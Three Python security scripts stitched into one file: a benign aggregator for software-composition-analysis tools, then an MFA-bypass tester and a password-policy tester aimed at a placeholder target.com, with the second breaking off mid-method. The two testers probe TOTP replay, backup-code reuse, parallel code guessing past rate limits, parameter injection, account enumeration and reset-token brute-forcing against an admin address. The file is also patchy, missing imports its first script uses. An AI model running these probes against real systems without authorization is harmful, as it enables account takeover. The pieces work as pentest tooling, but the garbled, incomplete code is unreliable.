import xml.etree.ElementTree as ET
from pathlib import Path
import tempfile
import os
class AdvancedSCAIntegrator:
    """Run several SCA command-line tools on a project and merge their findings.

    Each configured tool runs with the project directory as its working
    directory. Its JSON output is converted to one common finding format,
    then findings are de-duplicated across tools and sorted by severity.
    """

    # Tool-specific severity names mapped onto the CRITICAL/HIGH/MEDIUM/LOW scale.
    _SEVERITY_ALIASES = {'MODERATE': 'MEDIUM'}

    # Tools whose non-zero exit status is not reported as a problem.
    _NONZERO_EXIT_EXPECTED = ('snyk', 'npm_audit', 'pip_audit')

    def __init__(self, project_path):
        """Store the project path and the command line for every supported tool."""
        self.project_path = Path(project_path)
        self.results = {}
        # Tool configurations
        self.tools = {
            'owasp_dependency_check': {
                'command': 'dependency-check',
                'args': ['--scan', '.', '--format', 'JSON', '--out', 'dependency-check-report.json'],
                'report_file': 'dependency-check-report.json'
            },
            'snyk': {
                'command': 'snyk',
                'args': ['test', '--json'],
                'report_file': None  # Outputs to stdout
            },
            'trivy': {
                'command': 'trivy',
                'args': ['fs', '-f', 'json', '.'],
                'report_file': None  # Outputs to stdout
            },
            'npm_audit': {
                'command': 'npm',
                'args': ['audit', '--json'],
                'report_file': None  # Outputs to stdout
            },
            'pip_audit': {
                'command': 'pip-audit',
                'args': ['--format', 'json'],
                'report_file': None  # Outputs to stdout
            }
        }

    @classmethod
    def _normalize_severity(cls, value):
        """Return an upper-cased severity, defaulting to MEDIUM when missing."""
        severity = str(value or 'MEDIUM').upper()
        return cls._SEVERITY_ALIASES.get(severity, severity)

    def run_all_sca_tools(self):
        """Run every configured tool and return the merged report.

        A tool that cannot be started or raises is recorded in
        ``self.results`` as ``{'error': ...}`` and the run continues.
        """
        print(f"[*] Running SCA tools on {self.project_path}")
        for tool_name, config in self.tools.items():
            print(f"[*] Running {tool_name}...")
            try:
                self.results[tool_name] = self.run_tool(tool_name, config)
                print(f"[+] {tool_name} completed successfully")
            except Exception as e:
                print(f"[-] {tool_name} failed: {e}")
                self.results[tool_name] = {'error': str(e)}
        # Merge and analyze results
        return self.merge_results()

    def run_tool(self, tool_name, config):
        """Run one SCA tool inside the project directory and collect its output.

        Args:
            tool_name: Key of the tool in ``self.tools``.
            config: Dict with ``command``, ``args`` and ``report_file``.

        Returns:
            dict: ``returncode``, truncated ``stdout`` / ``stderr`` and the
            parsed ``output``; ``{'error': 'Timeout expired'}`` after five
            minutes.
        """
        cmd = [config['command'], *config['args']]
        try:
            # cwd= limits the directory change to the child process, so the
            # caller's working directory and relative paths stay valid.
            result = subprocess.run(
                cmd,
                cwd=self.project_path,
                capture_output=True,
                text=True,
                timeout=300  # 5 minute timeout
            )
        except subprocess.TimeoutExpired:
            return {'error': 'Timeout expired'}

        if result.returncode != 0 and tool_name not in self._NONZERO_EXIT_EXPECTED:
            print(f"[-] {tool_name} returned {result.returncode}")

        # Parse output
        if config['report_file']:
            # Read from report file
            report_path = self.project_path / config['report_file']
            if report_path.exists():
                with open(report_path, encoding='utf-8') as f:
                    output = json.load(f)
            else:
                output = {'error': 'Report file not found'}
        else:
            # Parse stdout
            try:
                output = json.loads(result.stdout)
            except json.JSONDecodeError:
                output = {'raw_output': result.stdout, 'stderr': result.stderr}
        return {
            'returncode': result.returncode,
            'stdout': result.stdout[:1000],  # First 1000 chars
            'stderr': result.stderr[:1000],
            'output': output
        }

    def merge_results(self):
        """Merge ``self.results`` into a unified report.

        Returns:
            dict: ``summary`` counters, the raw ``tool_results`` and the
            de-duplicated, severity-sorted ``vulnerabilities``.
        """
        merged_vulnerabilities = []
        # Extract vulnerabilities from each tool's output
        for tool_name, result in self.results.items():
            output = result.get('output')
            # Some pip-audit versions print a bare list of dependencies.
            if tool_name == 'pip_audit' and isinstance(output, list):
                output = {'dependencies': output}
            if isinstance(output, dict):
                merged_vulnerabilities.extend(self.extract_vulnerabilities(tool_name, output))
        # Deduplicate and prioritize
        unique_vulns = self.deduplicate_vulnerabilities(merged_vulnerabilities)
        # Generate unified report
        return {
            'summary': {
                'total_tools_run': len(self.results),
                'tools_successful': sum(1 for r in self.results.values() if 'error' not in r),
                'total_vulnerabilities': len(unique_vulns)
            },
            'tool_results': self.results,
            'vulnerabilities': unique_vulns
        }

    def extract_vulnerabilities(self, tool_name, output):
        """Convert one tool's JSON output into the common finding format.

        Every finding has ``tool``, ``source``, ``package``, ``vulnerability``,
        ``severity`` (normalized), ``description``, ``cvss_score`` and
        ``references``. Unknown tool names yield an empty list.
        """
        vulnerabilities = []
        if tool_name == 'owasp_dependency_check':
            # OWASP Dependency Check format
            for dep in output.get('dependencies') or []:
                file_name = dep.get('fileName', 'Unknown')
                for vuln in dep.get('vulnerabilities') or []:
                    vulnerabilities.append({
                        'tool': tool_name,
                        'source': 'dependency-check',
                        # "package" mirrors "dependency" so these findings
                        # de-duplicate and print like those of other tools.
                        'package': file_name,
                        'dependency': file_name,
                        'vulnerability': vuln.get('name', 'Unknown'),
                        'severity': self._normalize_severity(vuln.get('severity')),
                        'description': vuln.get('description', ''),
                        'cvss_score': (vuln.get('cvssv3') or {}).get('baseScore', 0),
                        'cwe': vuln.get('cwe', ''),
                        'references': vuln.get('references', [])
                    })
        elif tool_name == 'snyk':
            # Snyk format
            for vuln in output.get('vulnerabilities') or []:
                vulnerabilities.append({
                    'tool': tool_name,
                    'source': 'snyk',
                    'package': vuln.get('packageName', 'Unknown'),
                    'vulnerability': vuln.get('title', 'Unknown'),
                    'severity': self._normalize_severity(vuln.get('severity')),
                    'description': vuln.get('description', ''),
                    'cvss_score': vuln.get('cvssScore', 0),
                    'cwe': (vuln.get('identifiers') or {}).get('CWE', []),
                    'references': vuln.get('references', [])
                })
        elif tool_name == 'trivy':
            # Trivy format
            for result in output.get('Results') or []:
                for vuln in result.get('Vulnerabilities') or []:
                    nvd_scores = (vuln.get('CVSS') or {}).get('nvd') or {}
                    vulnerabilities.append({
                        'tool': tool_name,
                        'source': 'trivy',
                        'package': vuln.get('PkgName', 'Unknown'),
                        'vulnerability': vuln.get('VulnerabilityID', 'Unknown'),
                        'severity': self._normalize_severity(vuln.get('Severity')),
                        'description': vuln.get('Description', ''),
                        'cvss_score': nvd_scores.get('V3Score', 0),
                        'references': vuln.get('References', [])
                    })
        elif tool_name == 'npm_audit':
            # npm audit format
            for pkg_name, vuln_info in (output.get('vulnerabilities') or {}).items():
                for via in vuln_info.get('via') or []:
                    # String entries only name another package in the chain;
                    # dict entries describe an advisory.
                    if isinstance(via, dict):
                        vulnerabilities.append({
                            'tool': tool_name,
                            'source': 'npm-audit',
                            'package': pkg_name,
                            'vulnerability': via.get('title', 'Unknown'),
                            'severity': self._normalize_severity(via.get('severity')),
                            'description': via.get('description', ''),
                            'cvss_score': (via.get('cvss') or {}).get('score', 0),
                            'references': via.get('urls', [])
                        })
        elif tool_name == 'pip_audit':
            # pip-audit format: dependencies, each with a list of "vulns"
            for dep in output.get('dependencies') or []:
                for vuln in dep.get('vulns') or []:
                    vulnerabilities.append({
                        'tool': tool_name,
                        'source': 'pip-audit',
                        'package': dep.get('name', 'Unknown'),
                        'vulnerability': vuln.get('id', 'Unknown'),
                        # No severity field is read from this format; MEDIUM
                        # is the default used for the other tools.
                        'severity': self._normalize_severity(vuln.get('severity')),
                        'description': vuln.get('description', ''),
                        'cvss_score': 0,
                        'references': [],
                        'fix_versions': vuln.get('fix_versions', [])
                    })
        return vulnerabilities

    def deduplicate_vulnerabilities(self, vulnerabilities):
        """Merge findings that share package and vulnerability name.

        The first occurrence is kept. Its ``detected_by`` list names every
        tool that reported it, in order of appearance. The result is sorted
        CRITICAL, HIGH, MEDIUM, LOW, then anything else.
        """
        unique_vulns = []
        by_identifier = {}
        for vuln in vulnerabilities:
            identifier = (vuln.get('package'), vuln.get('vulnerability'))
            kept = by_identifier.get(identifier)
            if kept is None:
                kept = vuln
                by_identifier[identifier] = kept
                unique_vulns.append(kept)
                kept.setdefault('detected_by', [])
            tool = vuln.get('tool')
            if tool is not None and tool not in kept['detected_by']:
                kept['detected_by'].append(tool)
        # Sort by severity (CRITICAL, HIGH, MEDIUM, LOW)
        severity_order = {'CRITICAL': 0, 'HIGH': 1, 'MEDIUM': 2, 'LOW': 3}
        unique_vulns.sort(key=lambda x: severity_order.get(x.get('severity', 'MEDIUM'), 4))
        return unique_vulns

    def generate_remediation_plan(self, vulnerabilities):
        """Group remediation actions by urgency.

        CRITICAL and HIGH findings become immediate actions, MEDIUM findings
        short-term actions and everything else long-term actions.
        """
        remediation = {
            'immediate_actions': [],
            'short_term_actions': [],
            'long_term_actions': []
        }
        for vuln in vulnerabilities:
            severity = vuln.get('severity', 'MEDIUM')
            action = {
                'vulnerability': vuln.get('vulnerability'),
                'package': vuln.get('package'),
                'severity': severity,
                'action': self.get_remediation_action(vuln)
            }
            if severity in ('CRITICAL', 'HIGH'):
                remediation['immediate_actions'].append(action)
            elif severity == 'MEDIUM':
                remediation['short_term_actions'].append(action)
            else:
                remediation['long_term_actions'].append(action)
        return remediation

    def get_remediation_action(self, vulnerability):
        """Return the list of remediation steps for one finding.

        Package-manager-specific steps come first (chosen from the package
        name or the reporting tool), followed by general advice.
        """
        package = vulnerability.get('package') or ''
        tool = vulnerability.get('tool', '')
        actions = []
        # Package manager specific actions
        if 'package.json' in package or tool == 'npm_audit':
            actions.append("Run 'npm audit fix' to automatically fix vulnerabilities")
            actions.append("Update package.json with fixed versions")
        elif 'requirements.txt' in package or 'Pipfile' in package:
            actions.append("Update requirements.txt/Pipfile with secure versions")
            actions.append("Run 'pip-audit' to identify fixes")
        elif 'pom.xml' in package or 'build.gradle' in package:
            actions.append("Update Maven/Gradle dependencies")
            actions.append("Use versions-maven-plugin for dependency management")
        # General actions
        actions.append("Review vulnerability details and assess impact")
        actions.append("Test updates in development environment before production")
        actions.append("Consider using dependency locking (package-lock.json, Pipfile.lock)")
        return actions
# Usage: run every SCA tool against a project, print a summary and a
# truncated remediation plan, then export both as JSON files.
sca = AdvancedSCAIntegrator("/path/to/your/project")
results = sca.run_all_sca_tools()
summary = results['summary']
divider = '=' * 60
print(f"\n{divider}")
print("SOFTWARE COMPOSITION ANALYSIS RESULTS")
print(divider)
print(f"Tools Run: {summary['total_tools_run']}")
print(f"Tools Successful: {summary['tools_successful']}")
print(f"Total Vulnerabilities Found: {summary['total_vulnerabilities']}")
# Generate remediation plan
remediation = sca.generate_remediation_plan(results['vulnerabilities'])
immediate = remediation['immediate_actions']
short_term = remediation['short_term_actions']
print("\nREMEDIATION PLAN")
print(divider)
print(f"\nImmediate Actions ({len(immediate)}):")
for item in immediate[:3]:  # Show first 3
    print(f" - {item['package']}: {item['vulnerability']}")
    for step in item['action'][:2]:
        print(f" * {step}")
print(f"\nShort Term Actions ({len(short_term)}):")
for item in short_term[:2]:
    print(f" - {item['package']}: {item['vulnerability']}")
# Export results
for path, payload in (('sca-report.json', results),
                      ('remediation-plan.json', remediation)):
    with open(path, 'w') as f:
        json.dump(payload, f, indent=2)
print("\n[*] Reports saved to sca-report.json and remediation-plan.json")
#!/usr/bin/env python3
"""
Advanced MFA Bypass Testing Framework
Tests various MFA implementations for weaknesses
"""
import requests
import time
import pyotp
import re
from typing import Dict, List
from urllib.parse import urljoin, urlparse
class MFABypassTester:
    """Probe an application's MFA flow for common bypass weaknesses.

    Every ``test_*`` method sends requests through ``self.session`` and
    returns a list of finding dicts carrying at least the keys
    'technique', 'vulnerability' and 'evidence'. An HTTP 200 response is
    what the tests treat as "accepted". The endpoint paths are
    placeholders to adapt to the application under (authorized) test.
    """

    def __init__(self, base_url, session_cookies=None):
        """Create the HTTP session and register the available techniques.

        Args:
            base_url: Root URL that endpoint paths are joined onto.
            session_cookies: Optional mapping of cookies to preload into
                the session.
        """
        self.base_url = base_url
        self.session = requests.Session()
        if session_cookies:
            self.session.cookies.update(session_cookies)
        # Technique name -> bound method; run_all_tests() iterates this.
        self.techniques = {
            'backup_code_reuse': self.test_backup_code_reuse,
            'mfa_code_replay': self.test_code_replay,
            'mfa_timeout_bypass': self.test_timeout_bypass,
            'session_fixation_mfa': self.test_session_fixation,
            'api_endpoint_bypass': self.test_api_endpoint_bypass,
            'response_manipulation': self.test_response_manipulation,
            'rate_limit_bypass': self.test_rate_limit_bypass
        }

    def test_backup_code_reuse(self):
        """Check whether a backup code is accepted twice in a row.

        Returns:
            One finding per sample code that was accepted on both the
            first and the immediate second submission.
        """
        findings = []
        # Backup codes are expected to be single-use.
        for backup_code in ('12345678', '87654321'):
            first = self.submit_backup_code(backup_code)
            if first.status_code != 200:
                continue
            second = self.submit_backup_code(backup_code)
            if second.status_code == 200:
                findings.append({
                    'technique': 'backup_code_reuse',
                    'vulnerability': 'Backup codes can be reused',
                    'code': backup_code,
                    'evidence': f'Code accepted twice: {backup_code}'
                })
        return findings

    def test_code_replay(self, totp_secret="JBSWY3DPEHPK3PXP", wait_seconds=31):
        """Check whether a TOTP code is still accepted after waiting.

        Args:
            totp_secret: Base32 secret used to generate the code. The
                default is only an example value; a real test needs the
                secret of the enrolled test account.
            wait_seconds: Pause before the code is replayed. The default
                is just past a 30-second TOTP step.

        Returns:
            A single finding when the same code is accepted both before
            and after the wait, otherwise an empty list.
        """
        findings = []
        current_code = pyotp.TOTP(totp_secret).now()
        first = self.submit_totp_code(current_code)
        if first.status_code == 200:
            time.sleep(wait_seconds)
            second = self.submit_totp_code(current_code)
            if second.status_code == 200:
                findings.append({
                    'technique': 'mfa_code_replay',
                    'vulnerability': 'Expired TOTP codes can be replayed',
                    'evidence': f'Code {current_code} accepted after expiration'
                })
        return findings

    def test_timeout_bypass(self, wait_seconds=300):
        """Check whether an MFA challenge is still answerable after a wait.

        Args:
            wait_seconds: How long to wait after starting the challenge
                before submitting a code (default 300, i.e. 5 minutes).

        Returns:
            A single finding when the placeholder code '000000' is
            accepted after the wait, otherwise an empty list.
        """
        findings = []
        start_response = self.start_mfa_process()
        if start_response.status_code == 200:
            print(f"[*] Waiting for MFA timeout ({wait_seconds} seconds)...")
            time.sleep(wait_seconds)
            response = self.submit_totp_code('000000')
            if response.status_code == 200:
                findings.append({
                    'technique': 'mfa_timeout_bypass',
                    'vulnerability': 'MFA does not timeout',
                    # ':g' renders 300 s as "5", matching the default text.
                    'evidence': f'MFA code accepted after {wait_seconds / 60:g} minute delay'
                })
        return findings

    def test_session_fixation(self):
        """Check whether the pre-MFA session cookies stay valid afterwards.

        Returns:
            A single finding when the cookies captured before MFA differ
            from those after MFA and the old cookies are still accepted.
        """
        findings = []
        session_before = self.get_session_state()
        self.complete_mfa()
        session_after = self.get_session_state()
        # NOTE(review): when the cookies do not change at all nothing is
        # reported here; confirm whether that case should be flagged too.
        if session_before and session_after and session_before != session_after:
            old_session_response = self.use_session(session_before)
            if old_session_response.status_code == 200:
                findings.append({
                    'technique': 'session_fixation_mfa',
                    'vulnerability': 'Pre-MFA sessions remain valid',
                    'evidence': 'Old session accepted after MFA completion'
                })
        return findings

    def test_api_endpoint_bypass(self):
        """Look for API endpoints that answer without completed MFA.

        Returns:
            One finding per endpoint that returns 200 and whose body
            contains one of the sensitive-data keywords.
        """
        findings = []
        api_endpoints = [
            '/api/user/profile',
            '/api/account/settings',
            '/api/tokens/create',
            '/api/session/refresh',
            '/api/auth/verify',
            '/api/mfa/status',
            '/api/authenticated'
        ]
        sensitive_indicators = ('email', 'phone', 'address', 'permissions', 'roles')
        for endpoint in api_endpoints:
            response = self.session.get(urljoin(self.base_url, endpoint))
            if response.status_code != 200:
                continue
            response_text = response.text.lower()
            if any(indicator in response_text for indicator in sensitive_indicators):
                findings.append({
                    'technique': 'api_endpoint_bypass',
                    'vulnerability': f'API endpoint bypasses MFA: {endpoint}',
                    'evidence': f'Endpoint {endpoint} accessible without MFA'
                })
        return findings

    def test_response_manipulation(self):
        """Check whether extra request parameters flip the MFA verdict.

        The response-manipulation cases are only printed, because
        rewriting a server response needs an intercepting proxy. The
        parameter-manipulation cases are sent to the verify endpoint.

        Returns:
            One finding per injected parameter for which the JSON reply
            has a truthy 'authenticated' or 'verified' field.
        """
        findings = []
        verify_url = urljoin(self.base_url, '/api/mfa/verify')
        headers = {'Content-Type': 'application/json'}
        manipulated_responses = [
            {'status': 'success', 'verified': True},
            {'status': 'verified', 'mfa_passed': True},
            {'authenticated': True, 'mfa_complete': True},
            {'result': 'ok', 'code': 200}
        ]
        for manipulated_response in manipulated_responses:
            print(f"[*] Testing response manipulation: {manipulated_response}")
        for param in ('verified', 'success', 'authenticated', 'status'):
            response = self.session.post(
                verify_url,
                json={'code': '123456', param: 'true'},
                headers=headers
            )
            if response.status_code != 200:
                continue
            try:
                response_data = response.json()
            except ValueError:
                # Body is not JSON; nothing to inspect.
                continue
            if not isinstance(response_data, dict):
                continue
            if response_data.get('authenticated') or response_data.get('verified'):
                findings.append({
                    'technique': 'response_manipulation',
                    'vulnerability': f'MFA bypass via parameter: {param}',
                    'evidence': f'Parameter {param}=true bypassed MFA'
                })
        return findings

    def test_rate_limit_bypass(self):
        """Check whether repeated and parallel code guesses are throttled.

        Ten placeholder codes are submitted sequentially (0.5 s apart)
        and then concurrently from ten worker threads.

        Returns:
            Up to two findings: one when more than three sequential
            submissions return 200, one when more than three parallel
            submissions do.
        """
        import concurrent.futures

        findings = []
        test_codes = ['000000', '111111', '222222', '333333', '444444',
                      '555555', '666666', '777777', '888888', '999999']
        successful_attempts = 0
        for code in test_codes:
            response = self.submit_totp_code(code)
            if response.status_code == 200:
                successful_attempts += 1
            # Small delay between attempts
            time.sleep(0.5)
        if successful_attempts > 3:
            findings.append({
                'technique': 'rate_limit_bypass',
                'vulnerability': 'Weak or no MFA rate limiting',
                'evidence': f'{successful_attempts}/10 invalid codes accepted'
            })
        # Send the same guesses simultaneously.
        parallel_success = 0
        with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
            futures = [executor.submit(self.submit_totp_code, code) for code in test_codes]
            for future in concurrent.futures.as_completed(futures):
                try:
                    response = future.result()
                except Exception as exc:
                    # A failed request is not an accepted code; report it
                    # instead of silently dropping it.
                    print(f"[-] Parallel MFA attempt failed: {exc}")
                    continue
                if response.status_code == 200:
                    parallel_success += 1
        if parallel_success > 3:
            findings.append({
                'technique': 'rate_limit_bypass',
                'vulnerability': 'Rate limiting bypassed via parallel requests',
                'evidence': f'{parallel_success}/10 parallel invalid codes accepted'
            })
        return findings

    def run_all_tests(self):
        """Run every registered technique and summarise the findings.

        A technique that raises is reported on stdout and skipped so the
        remaining techniques still run.

        Returns:
            Dict with 'total_findings', 'findings_by_technique' (name ->
            count), 'findings_by_severity' (left empty; findings carry no
            severity) and 'detailed_findings'.
        """
        all_findings = []
        print("[*] Starting MFA bypass tests")
        for technique_name, technique_func in self.techniques.items():
            print(f"[*] Testing {technique_name}...")
            try:
                findings = technique_func()
                all_findings.extend(findings)
                print(f"[+] {technique_name}: {len(findings)} findings")
            except Exception as e:
                print(f"[-] {technique_name} failed: {e}")
        by_technique = {}
        for finding in all_findings:
            technique = finding.get('technique', 'unknown')
            by_technique[technique] = by_technique.get(technique, 0) + 1
        return {
            'total_findings': len(all_findings),
            'findings_by_technique': by_technique,
            'findings_by_severity': {},
            'detailed_findings': all_findings
        }

    # Helper methods (implement based on target application)
    def submit_backup_code(self, code):
        """POST a backup code to the backup-code endpoint."""
        url = urljoin(self.base_url, '/api/mfa/backup')
        return self.session.post(url, json={'code': code})

    def submit_totp_code(self, code):
        """POST a TOTP code to the verify endpoint."""
        url = urljoin(self.base_url, '/api/mfa/verify')
        return self.session.post(url, json={'code': code})

    def start_mfa_process(self):
        """POST to the endpoint that starts an MFA challenge."""
        url = urljoin(self.base_url, '/api/mfa/start')
        return self.session.post(url)

    def get_session_state(self):
        """Return the session's current cookies as a plain dict."""
        return self.session.cookies.get_dict()

    def complete_mfa(self):
        """POST to the endpoint that completes MFA (simulated)."""
        url = urljoin(self.base_url, '/api/mfa/complete')
        return self.session.post(url)

    def use_session(self, session_cookies):
        """GET the profile endpoint using only the given cookies.

        A throwaway session is used so the main session's cookies are
        not sent; it is closed before returning.
        """
        url = urljoin(self.base_url, '/api/user/profile')
        with requests.Session() as temp_session:
            temp_session.cookies.update(session_cookies)
            return temp_session.get(url)
# Usage: run every MFA bypass technique and print a short report.
tester = MFABypassTester(
    "http://target.com",
    session_cookies={"SESSION": "your_session_id"}
)
report = tester.run_all_tests()
divider = '=' * 60
print(f"\n{divider}")
print("MFA BYPASS TESTING REPORT")
print(divider)
print(f"Total Findings: {report['total_findings']}")
if report['total_findings'] > 0:
    print("\nFindings by Technique:")
    for technique, count in report['findings_by_technique'].items():
        print(f" {technique}: {count}")
    print("\nCRITICAL FINDINGS:")
    # Findings whose description mentions "reuse" or "bypass".
    critical_findings = []
    for entry in report['detailed_findings']:
        description = entry.get('vulnerability', '').lower()
        if 'reuse' in description or 'bypass' in description:
            critical_findings.append(entry)
    for finding in critical_findings[:3]:
        print(f" - {finding['vulnerability']}")
        print(f" Evidence: {finding.get('evidence', '')[:100]}...")
#!/usr/bin/env python3
"""
Advanced Password Policy Testing and Weakness Analysis
Tests password policies, reset mechanisms, and storage
"""
import requests
import re
import hashlib
import json
from typing import Dict, List
from urllib.parse import urljoin
import time
class PasswordPolicyTester:
    """Exercise a target's password policy, reset flow and lockout handling.

    Every ``test_*`` method talks to the target through ``self.session``
    and returns a list of finding dicts with at least 'test', 'result'
    and 'evidence' keys. An HTTP 200 response is what the tests treat as
    "accepted". Endpoint paths are placeholders to adapt to the
    application under (authorized) test.
    """

    # Default pause between consecutive requests, in seconds.
    request_delay = 0.5

    def __init__(self, base_url, request_delay=0.5):
        """Create the HTTP session.

        Args:
            base_url: Root URL that endpoint paths are joined onto.
            request_delay: Seconds to pause between consecutive requests
                in the looping tests.
        """
        self.base_url = base_url
        self.session = requests.Session()
        self.findings = []
        self.request_delay = request_delay

    def test_password_complexity(self):
        """Try to register accounts with a catalogue of weak passwords.

        Returns:
            One finding per password that was accepted (status 200), per
            password rejected with a message mentioning password
            weakness/strength, and per request that raised.
        """
        findings = []
        test_passwords = [
            # Common weak passwords
            ('password', 'No complexity'),
            ('123456', 'No complexity'),
            ('qwerty', 'No complexity'),
            ('letmein', 'No complexity'),
            # Short passwords
            ('a', 'Too short'),
            ('ab', 'Too short'),
            ('abc', 'Too short'),
            ('abcd', 'Too short'),
            # Common patterns
            ('Password1', 'Common pattern'),
            ('Welcome1', 'Common pattern'),
            ('Summer2023', 'Common pattern'),
            ('Winter2023!', 'Common pattern'),
            # Sequential characters
            ('abcdefg', 'Sequential letters'),
            ('12345678', 'Sequential numbers'),
            ('qwertyui', 'Keyboard pattern'),
            ('asdfghjk', 'Keyboard pattern'),
            # Repetitive characters
            ('aaaaaa', 'Repeating characters'),
            ('111111', 'Repeating numbers'),
            ('ababab', 'Repeating pattern'),
            # Dictionary words
            ('dragon', 'Dictionary word'),
            ('sunshine', 'Dictionary word'),
            ('princess', 'Dictionary word'),
            ('football', 'Dictionary word'),
        ]
        registration_endpoint = urljoin(self.base_url, '/api/register')
        run_id = int(time.time())
        for index, (password, reason) in enumerate(test_passwords):
            # The index keeps every username/e-mail unique within a run;
            # a timestamp alone repeats for requests sent within the same
            # second, and a duplicate-account rejection would then hide
            # the password-policy result.
            account = f'test_{run_id}_{index}'
            test_data = {
                'username': account,
                'email': f'{account}@example.com',
                'password': password,
                'confirm_password': password
            }
            try:
                response = self.session.post(registration_endpoint, json=test_data)
            except Exception as e:
                findings.append({
                    'test': 'password_complexity',
                    'password': password,
                    'reason': reason,
                    'result': 'ERROR',
                    'evidence': str(e)
                })
            else:
                if response.status_code == 200:
                    findings.append({
                        'test': 'password_complexity',
                        'password': password,
                        'reason': reason,
                        'result': 'ACCEPTED (VULNERABLE)',
                        'evidence': f'Weak password "{password}" accepted during registration'
                    })
                else:
                    error_msg = response.text.lower()
                    if 'password' in error_msg and ('weak' in error_msg or 'strength' in error_msg):
                        findings.append({
                            'test': 'password_complexity',
                            'password': password,
                            'reason': reason,
                            'result': 'REJECTED (GOOD)',
                            'evidence': f'Weak password "{password}" rejected: {error_msg[:100]}'
                        })
            time.sleep(self.request_delay)  # Rate limiting
        return findings

    def test_password_history(self):
        """Check whether a previously used password can be set again.

        Registers and logs in a fresh user, changes the password twice,
        then tries to change it back to the original.

        Returns:
            A VULNERABLE finding when the original password is accepted
            again, a SECURE finding when it is rejected with a message
            mentioning 'previous' or 'history', otherwise an empty list
            (also when registration or login does not return 200).
        """
        findings = []
        original_password = 'InitialPassword1!'
        stamp = int(time.time())
        user_data = {
            'username': f'history_test_{stamp}',
            'email': f'history_{stamp}@example.com',
            'password': original_password,
            'confirm_password': original_password
        }
        register_response = self.session.post(
            urljoin(self.base_url, '/api/register'),
            json=user_data
        )
        if register_response.status_code != 200:
            return findings
        login_response = self.session.post(
            urljoin(self.base_url, '/api/login'),
            json={'email': user_data['email'], 'password': original_password}
        )
        if login_response.status_code != 200:
            return findings
        change_url = urljoin(self.base_url, '/api/change-password')
        current_password = original_password
        for new_password in ('NewPassword1!', 'AnotherPassword2@', original_password):
            change_response = self.session.post(
                change_url,
                json={
                    'current_password': current_password,
                    'new_password': new_password,
                    'confirm_password': new_password
                }
            )
            reusing_original = new_password == original_password
            if change_response.status_code == 200:
                if reusing_original:
                    findings.append({
                        'test': 'password_history',
                        'result': 'VULNERABLE',
                        'evidence': 'Previous password reused successfully'
                    })
                else:
                    # The accepted password is the current one next time.
                    current_password = new_password
            elif reusing_original:
                error_msg = change_response.text.lower()
                if 'previous' in error_msg or 'history' in error_msg:
                    findings.append({
                        'test': 'password_history',
                        'result': 'SECURE',
                        'evidence': 'Password history enforced: ' + error_msg[:100]
                    })
        return findings

    def test_password_reset_mechanism(self):
        """Probe the password reset flow for common weaknesses.

        Returns:
            Findings for account enumeration via the reset response,
            guessable reset tokens being accepted, a standing reminder to
            test token expiry manually, and a POTENTIALLY_VULNERABLE note
            when a reset for the admin address is simply acknowledged.
        """
        findings = []
        request_url = urljoin(self.base_url, '/api/password/reset/request')
        confirm_url = urljoin(self.base_url, '/api/password/reset/confirm')
        # Test 1: account enumeration through the reset response
        for email in ('test@example.com', 'admin@target.com', 'user@target.com'):
            reset_request = self.session.post(request_url, json={'email': email})
            if reset_request.status_code != 200:
                continue
            response_text = reset_request.text.lower()
            if 'exist' in response_text or 'not found' in response_text:
                findings.append({
                    'test': 'password_reset_info_disclosure',
                    'email': email,
                    'result': 'VULNERABLE',
                    'evidence': 'Email existence disclosed in reset response'
                })
        # Test 2: guessable reset tokens
        predictable_tokens = [
            '000000', '111111', '123456', '654321',
            'abcdef', 'password', 'reset123'
        ]
        for token in predictable_tokens:
            reset_attempt = self.session.post(
                confirm_url,
                json={'token': token, 'new_password': 'NewPassword123!'}
            )
            if reset_attempt.status_code == 200:
                findings.append({
                    'test': 'password_reset_token_bruteforce',
                    'token': token,
                    'result': 'VULNERABLE',
                    'evidence': f'Predictable token accepted: {token}'
                })
        # Test 3: token expiration cannot be automated without a captured
        # valid token, so it is recorded as a manual follow-up.
        findings.append({
            'test': 'password_reset_token_expiration',
            'result': 'MANUAL_TEST_REQUIRED',
            'evidence': 'Manually test if reset tokens expire appropriately'
        })
        # Test 4: reset requested for another (admin) account
        takeover_attempt = self.session.post(request_url, json={'email': 'admin@target.com'})
        if takeover_attempt.status_code == 200:
            response_text = takeover_attempt.text.lower()
            if 'sent' in response_text and 'email' in response_text:
                findings.append({
                    'test': 'password_reset_account_takeover',
                    'result': 'POTENTIALLY_VULNERABLE',
                    'evidence': 'Password reset initiated for admin without additional verification'
                })
        return findings

    def test_password_storage(self):
        """Look for externally visible hints about password storage.

        Returns:
            A POTENTIAL_INDICATOR finding when the first two login
            timings differ by more than 100 ms, and a VULNERABLE finding
            when an error response mentions password hashing/encryption.
        """
        findings = []
        login_url = urljoin(self.base_url, '/api/login')
        # Test 1: baseline login request. Whether the password leaks into
        # logs or URLs has to be checked by monitoring; the response is
        # not inspected here.
        self.session.post(
            login_url,
            json={'email': 'test@example.com', 'password': 'testpassword'}
        )
        # Test 2: compare response times across credential combinations
        test_credentials = [
            ('realuser@example.com', 'realpassword'),
            ('realuser@example.com', 'wrongpassword'),
            ('nonexistent@example.com', 'anypassword')
        ]
        timings = []
        for email, password in test_credentials:
            # perf_counter is monotonic, so a wall-clock adjustment during
            # the request cannot distort the measured interval.
            started = time.perf_counter()
            self.session.post(
                login_url,
                json={'email': email, 'password': password},
                timeout=5
            )
            timings.append(time.perf_counter() - started)
            # Twice the normal pause (1 s with the default delay).
            time.sleep(self.request_delay * 2)
        valid_time, invalid_time = timings[0], timings[1]
        if abs(valid_time - invalid_time) > 0.1:  # 100ms difference
            findings.append({
                'test': 'password_hash_timing',
                'result': 'POTENTIAL_INDICATOR',
                'evidence': f'Timing difference detected: {valid_time:.3f}s vs {invalid_time:.3f}s'
            })
        # Test 3: storage details leaking through an error message
        error_test = self.session.post(login_url, json={'email': '', 'password': ''})
        error_text = error_test.text.lower()
        if 'password' in error_text and ('hash' in error_text or 'encrypt' in error_text):
            findings.append({
                'test': 'password_storage_info_disclosure',
                'result': 'VULNERABLE',
                'evidence': 'Password storage mechanism disclosed in error message'
            })
        return findings

    def test_account_lockout(self):
        """Check whether repeated failed logins trigger a lockout.

        Registers a fresh user and sends up to 15 logins with a wrong
        password, stopping at the first non-200 response whose body
        mentions a lockout term.

        Returns:
            A SECURE finding when a lockout message is seen, a VULNERABLE
            finding when none is seen, or an empty list when registration
            does not return 200.
        """
        findings = []
        stamp = int(time.time())
        test_email = f'lockout_test_{stamp}@example.com'
        register_data = {
            'username': f'lockout_{stamp}',
            'email': test_email,
            'password': 'ValidPassword1!',
            'confirm_password': 'ValidPassword1!'
        }
        register_response = self.session.post(
